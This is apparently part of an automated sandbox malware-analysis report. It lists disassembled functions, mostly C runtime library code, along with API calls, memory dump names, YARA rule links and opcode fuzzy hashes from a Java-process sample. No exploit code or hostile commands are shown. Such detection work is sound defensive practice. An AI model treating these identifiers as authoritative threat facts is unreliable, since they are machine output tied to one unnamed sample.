                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A930A2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,73A99B80,00000008,73A931AA,00000000,00000000,?,73A93512,?,00000001,?,?,73A93FA4,00000018,73A99BD0,0000000C), ref: 73A930B3
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 73A930E7
                                                                                                                                                                                                                                      • Part of subcall function 73A94019: __mtinitlocknum.LIBCMT ref: 73A9402F
                                                                                                                                                                                                                                      • Part of subcall function 73A94019: __amsg_exit.LIBCMT ref: 73A9403B
                                                                                                                                                                                                                                      • Part of subcall function 73A94019: EnterCriticalSection.KERNEL32(00000000,00000000,?,73A91E57,?,?,73A91362,00000001,00000000,73A99B00,0000000C,73A91188,asdasdasdasdasdsdasd), ref: 73A94043
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(73A9B590), ref: 73A930F4
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 73A93108
                                                                                                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 73A93126
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                    • String ID: KERNEL32.DLL
                                                                                                                                                                                                                                    • API String ID: 637971194-2576044830
                                                                                                                                                                                                                                    • Opcode ID: 59769e6f3b85f31bf294047453a18a7855f0eb4fe1ed60d46064469f82ea2014
                                                                                                                                                                                                                                    • Instruction ID: 18a660c98a1484c5f1b0432f916bd5dc1daa3218196ff06e84c1e99269624307
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59769e6f3b85f31bf294047453a18a7855f0eb4fe1ed60d46064469f82ea2014
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0013071801704EFF7209F6AD546749FBF4AF48325F20890FD496763A4CB74A540CB19
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A94E34 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 73A94E40
                                                                                                                                                                                                                                      • Part of subcall function 73A931CF: __getptd_noexit.LIBCMT ref: 73A931D2
                                                                                                                                                                                                                                      • Part of subcall function 73A931CF: __amsg_exit.LIBCMT ref: 73A931DF
                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 73A94E60
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 73A94E70
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 73A94E8D
                                                                                                                                                                                                                                    • _free.LIBCMT ref: 73A94EA0
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(16DB1610), ref: 73A94EB8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                                                                                                    • Opcode ID: 1c1d14dfe4719772cf258b0c8f5b379734d31afb8e49325d99d74178ba72682c
                                                                                                                                                                                                                                    • Instruction ID: f85075d78eb16ccdef9844e47373c82ffd665848e1a82dd2a4d2aeac4ca09d4a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c1d14dfe4719772cf258b0c8f5b379734d31afb8e49325d99d74178ba72682c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36013C32901735DFFB21EB25854778D77E4AB08711F25010BE815B76D8CB345941CB99
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A95C44 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 73A95C52
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: __FF_MSGBANNER.LIBCMT ref: 73A912A6
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: __NMSG_WRITE.LIBCMT ref: 73A912AD
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,73A93512,?,00000001,?,?,73A93FA4,00000018,73A99BD0,0000000C,73A94034), ref: 73A912D2
                                                                                                                                                                                                                                    • _free.LIBCMT ref: 73A95C65
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocHeap_free_malloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2734353464-0
                                                                                                                                                                                                                                    • Opcode ID: 9df77852ca6453fcd77700b0ef14c3ef828ec910d456d7be0b36569f7c2ea8bf
                                                                                                                                                                                                                                    • Instruction ID: d9afc59f08500c1d968c5991fd2ad7bbdb164d6724d422205b18782ec426d847
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9df77852ca6453fcd77700b0ef14c3ef828ec910d456d7be0b36569f7c2ea8bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11EBB29057119FFF122F719E0F74937E9DF85261B25402BE44ABA2ACDE30C4458AAC
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A955B5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 73A955C1
                                                                                                                                                                                                                                      • Part of subcall function 73A931CF: __getptd_noexit.LIBCMT ref: 73A931D2
                                                                                                                                                                                                                                      • Part of subcall function 73A931CF: __amsg_exit.LIBCMT ref: 73A931DF
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 73A955D8
                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 73A955E6
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 73A955F6
                                                                                                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 73A9560A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 938513278-0
                                                                                                                                                                                                                                    • Opcode ID: 991ce48f239fb38ca1c6964b94e95279b6fb964f6f8eda3b9af71599800f46dd
                                                                                                                                                                                                                                    • Instruction ID: c46034bf7e960890e0230aaf9daa147b2e2427fcd4019e176249e2b8f2dd6052
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 991ce48f239fb38ca1c6964b94e95279b6fb964f6f8eda3b9af71599800f46dd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AF09072901324EFFB21AB698A0374D77E1AF08724F25010BD815BB3EACF2449418A5D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A97A3F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 73A97A73
                                                                                                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 73A97AA6
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000), ref: 73A97AD7
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,00000001,00000000,00000000,?,?,?,?,00000000,00000000), ref: 73A97B45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                                                                                                    • Opcode ID: 43ec8cc51eb57790a6398e808e91cc8f8973ee97f4f15318585637f8bf19bba7
                                                                                                                                                                                                                                    • Instruction ID: 36677f87cf0bc64d325b8f90e9e3d70404f88373f70e5b5d1b69f13e3d4a5ad3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43ec8cc51eb57790a6398e808e91cc8f8973ee97f4f15318585637f8bf19bba7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9331B531A00246EFEB01CFA4C842BA93BF5BF05211B18856EE056AB1D9D733DA40CB64
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 02FDD8F7 Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: af2cc063f37fbbac0544e45b218d5d75b1242b4c3a4119ddd17cf09683230205
                                                                                                                                                                                                                                    • Instruction ID: 2b81284683ebde821352b4d0117b5565a23d54d0ecf4d8ed84b139d2b53bc6ae
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af2cc063f37fbbac0544e45b218d5d75b1242b4c3a4119ddd17cf09683230205
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32A19E76A04601DFDB18CF64C894BAAFBB2FF49358F08859DDA1A4B381C735B845CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FDD8E0 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9f4197b22ef86269e7951667989787e638a650fd87ef244f006b8768e296549e
                                                                                                                                                                                                                                    • Instruction ID: 6be1f59f3255062651d87c7e822dec784f411a18c0b5b08fb34a3c2eb67ac678
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f4197b22ef86269e7951667989787e638a650fd87ef244f006b8768e296549e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF61AB72A04601DFDB18CF24C894BAAF7B2FB49758F08859DDA1A4B381C774B845CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FD0672 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd0000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: d61c110d2cda61784ef97d3302bc2e76e4668c41f83201132fff20d6976a7cc2
                                                                                                                                                                                                                                    • Instruction ID: cffe4f01fd944af38f326ee7041ef75df349cf530f3ef73e9a4529d775bc167c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d61c110d2cda61784ef97d3302bc2e76e4668c41f83201132fff20d6976a7cc2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D115BB6D0022ADFCF28CF48C4854ADB7B2FB98354F1A8529ED65A7341DB346920CF91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FD0667 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd0000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7c5cfb8af38ee5ede284cb1d7ff5fee5f41b93cdf5cd56a48a707e3dbe9d03b5
                                                                                                                                                                                                                                    • Instruction ID: cf2870f13879185932b04143c9d00373d71be166b027f22b3e1484c21b36ff97
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c5cfb8af38ee5ede284cb1d7ff5fee5f41b93cdf5cd56a48a707e3dbe9d03b5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70115BB6D0022A9FCF28CF88C4864ADB7B1FB49354F0A4559DD64A7342D7386961CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FD0722 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd0000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b9c55746d63bca98fd3f66c13fdb8eb4e993777a1b5bc321808caaf26eee05a0
                                                                                                                                                                                                                                    • Instruction ID: a3309a3a8b583969f4f5f9e87f24d17247d0927755f596206c2f89a30067aa66
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9c55746d63bca98fd3f66c13fdb8eb4e993777a1b5bc321808caaf26eee05a0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F0157AC0022DDB8B14DF48C4400ADB7B2FB04318F1E849ADD287B241D732AD62CF91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FE4CCD Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: ad38d82d2315de585df249cfa8301057ad3bf879357df8d92875d983bc94917d
                                                                                                                                                                                                                                    • Instruction ID: 577e0b2613aa3bbd455468f801b660a388eb8df363d657756702bf340afe1541
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad38d82d2315de585df249cfa8301057ad3bf879357df8d92875d983bc94917d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F07FB6904A06EBEB19CF65C404BEAF7B4FB88714F14461AD52C57350C778B465CBD0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FE4B78 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: fe53a8ae2b39ab58df7fd10e52011d72767978863297a8120e0fed1e7798e528
                                                                                                                                                                                                                                    • Instruction ID: 4fe0ee3922d34a399e49163486847a9100804c57b66f36f2e47ed5ff0b81ec63
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe53a8ae2b39ab58df7fd10e52011d72767978863297a8120e0fed1e7798e528
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F079B6A04A06EBDB258F61C0047DAFBB4BB88718F18821AD92C67350D778B4658BC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FE5346 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 54637c848483695c5ee7c69315146c521b255d7532b610fb7744dcf8dd11d0b4
                                                                                                                                                                                                                                    • Instruction ID: 9005bb14940a4aea37256a13e67e274b9fbe34e8c7ddae5bd8457863e3f5780e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54637c848483695c5ee7c69315146c521b255d7532b610fb7744dcf8dd11d0b4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77F09BB6A04A06EBDB25CF61C1047DAFBB4BB48714F15421AC52C67360C778B465CFC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FE6495 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 11f159eb2b0a37ecda4a18129752b06591e3042840ec3d4c6a14914a74fdf9ba
                                                                                                                                                                                                                                    • Instruction ID: 41a6cdb97b8d1330e35c91d96412c74d5041c531a4b064322184713d4baa9bc9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11f159eb2b0a37ecda4a18129752b06591e3042840ec3d4c6a14914a74fdf9ba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99F09BBAA04A06EBDB25CF65C0047CAFBB4BB88714F58421AC92C67360D778B465CFC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FDEC1C Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 300fd17247e784dbe20c3176527277290587706d87ff44c88a3a76db59343ba5
                                                                                                                                                                                                                                    • Instruction ID: 58243e3fbba491198b8e547fd3a0e79d6f38469b46b8423d937db10563970225
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 300fd17247e784dbe20c3176527277290587706d87ff44c88a3a76db59343ba5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0F079B6A04A06EBDB298F61C0047DAFBB4BB88718F14421AC52C67360D778B4698BC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FDDA35 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 77806cee60565df2a7e07185838bac06e8fa1c1f341847469a56bead72a146ca
                                                                                                                                                                                                                                    • Instruction ID: 613aa1d332bc6e4525d6ba4cb19333841132370366716600e6a0f4cf2eb69a92
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77806cee60565df2a7e07185838bac06e8fa1c1f341847469a56bead72a146ca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F0CAB6D00A0AABDB248FA1C4047DAFBB5BB88714F18461AC92C67320D778B465CFC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FE49AA Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7cede5c9e95d831f56934b303313ea4ec69a5fcc2d7ade16830bba602f29541f
                                                                                                                                                                                                                                    • Instruction ID: f03f9c71420a608ac375e9fcfa813524acb6ca9157c2b850f5632a72597669ac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cede5c9e95d831f56934b303313ea4ec69a5fcc2d7ade16830bba602f29541f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0CAB6D00A06ABDB248FA1C1047CAFBB4BB88714F18421AC52C67320D778B465CFC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

